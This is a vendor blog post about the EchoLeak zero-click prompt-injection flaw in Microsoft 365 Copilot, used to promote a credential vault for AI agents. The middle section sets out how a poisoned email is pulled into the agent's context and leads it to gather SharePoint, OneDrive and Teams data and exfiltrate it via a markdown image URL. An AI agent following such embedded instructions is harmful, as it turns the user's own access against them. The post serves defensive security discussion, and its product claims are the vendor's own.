AI agents are now phishing targets

Nobody clicked anything, and they got phished anyway. The phishing email has always needed a gullible human on the other end, someone to click the link, type the password, approve the prompt. EchoLeak did not bother. There was no human to fool. The mark was the agent.

That is the part people keep getting wrong about it. There was no bad link to avoid, no attachment to not open, no login page to not fall for. The victim did nothing, because there was nothing for them to do. The attack ran entirely on the agent.

The shape of it

CVE-2025-32711 [3], found by Aim Labs [1], rated 9.3 by Microsoft [2]. An attacker sends an ordinary-looking email to someone inside an organization running Microsoft 365 Copilot. Buried in that email are instructions written for the model, not the human. The human never has to read it. At some point Copilot does what it is built to do, reaches into the user's world to answer a question, and its own retrieval pulls the poisoned email in alongside everything else. Now the malicious instructions are inside the model's context, indistinguishable from the real task. The model follows them. It goes and gathers what it can reach, SharePoint, OneDrive, Teams, the things this user is allowed to see, and it walks the data back out through a markdown image URL pointed at the attacker's server [1]. The browser fetches the image. The fetch carries the secret. Zero clicks, start to finish.

Microsoft fixed it server-side, no customer action required, and reported no evidence it was exploited in the wild [2]. The research went public in June 2025 [4]. The specific hole is closed. The shape is not.

Notice what actually did the work. The attacker never broke in. They never touched SharePoint, never stole a password, never ran code on anyone's machine. They wrote an email. The agent did everything else, using access it already had, on behalf of a user who never asked. The danger was not an intruder you could block at the door. It was your own assistant, turned around mid-sentence and pointed back at you.

Why this one matters more than a CVE

Prompt injection is not a bug you finish fixing. A large language model follows instructions in its context. That is not a flaw in the product, that is the product. As long as untrusted text can reach the context, and for any useful agent it can, some fraction of injections will slip past the classifiers. You will eventually run an agent that has been quietly told to do something you did not ask for. Treat that as a certainty, because the people attacking you already do.

So the question stops being how to keep every malicious instruction out. You will not win that race cleanly, the same way you will not out-vet a supply chain. The real question is the one you can actually answer with architecture.

> When your agent is turned against you, what can it reach?

For most setups, the honest answer is everything. The agent runs with broad ambient access, a wide grant of standing permission, because that was the easy way to make it useful. It can see the whole share. It can enumerate. It can wander. EchoLeak weaponized exactly that. The hijack was the spark, but the blast radius was the access.

Keep the crown jewels out of reach

This is the part Clavitor is built around, for credentials specifically. We do not promise to stop prompt injection, and we are not standing in front of your documents. What we refuse is the buffet. An agent on Clavitor cannot reach a credential it was not explicitly named to use. There is no list to read, no search, no discovery, enumeration is impossible at the protocol level, not merely throttled. The credential is fetched fresh at the instant of use, never stored, never cached, gone again after. Every access is logged to a specific actor. The grant is pinned to the machine it was issued to, so lifted and replayed from somewhere else it is simply refused. And it is rate-limited, so an agent reaching past its normal handful trips an alert and locks instead of sweeping the vault.

Run the EchoLeak playbook against that and it stalls. A hijacked agent can still be told to go gather secrets. It just has nowhere to gather them from. It cannot ask what credentials exist. It cannot pull the ones it was never granted. The one it legitimately holds at that instant, used live, can be misused for that instant, and that is the honest edge of the claim, no architecture rewrites physics. But the move that makes these attacks devastating, one compromise reaching everything at once, is the exact move that does not work. Broad ambient access turns a clever email into a breach. Scoped, named, audited access turns the same email into a logged request for one thing the agent already had, and nothing else.

Nobody clicked anything. That is not the failure, that is the future. The agent is the attack surface now. So stop handing it the keys to everything and hoping the classifier holds. Give it the use of exactly what it was named for, on the record, and make sure that when it gets turned around, the room it walks into is nearly empty.

Clavitor is the credential vault built for AI agents, and against them.

Sources

1. Aim Labs — Breaking down EchoLeak, the first zero-click AI vulnerability enabling data exfiltration from Microsoft 365 Copilot (published via Cato Networks)
2. Microsoft Security Response Center — CVE-2025-32711 (Microsoft rating CVSS 9.3)
3. NVD — CVE-2025-32711 (NIST base score 7.5; Microsoft 9.3)
4. The Hacker News — Zero-click AI vulnerability exposes Microsoft 365 Copilot data without user interaction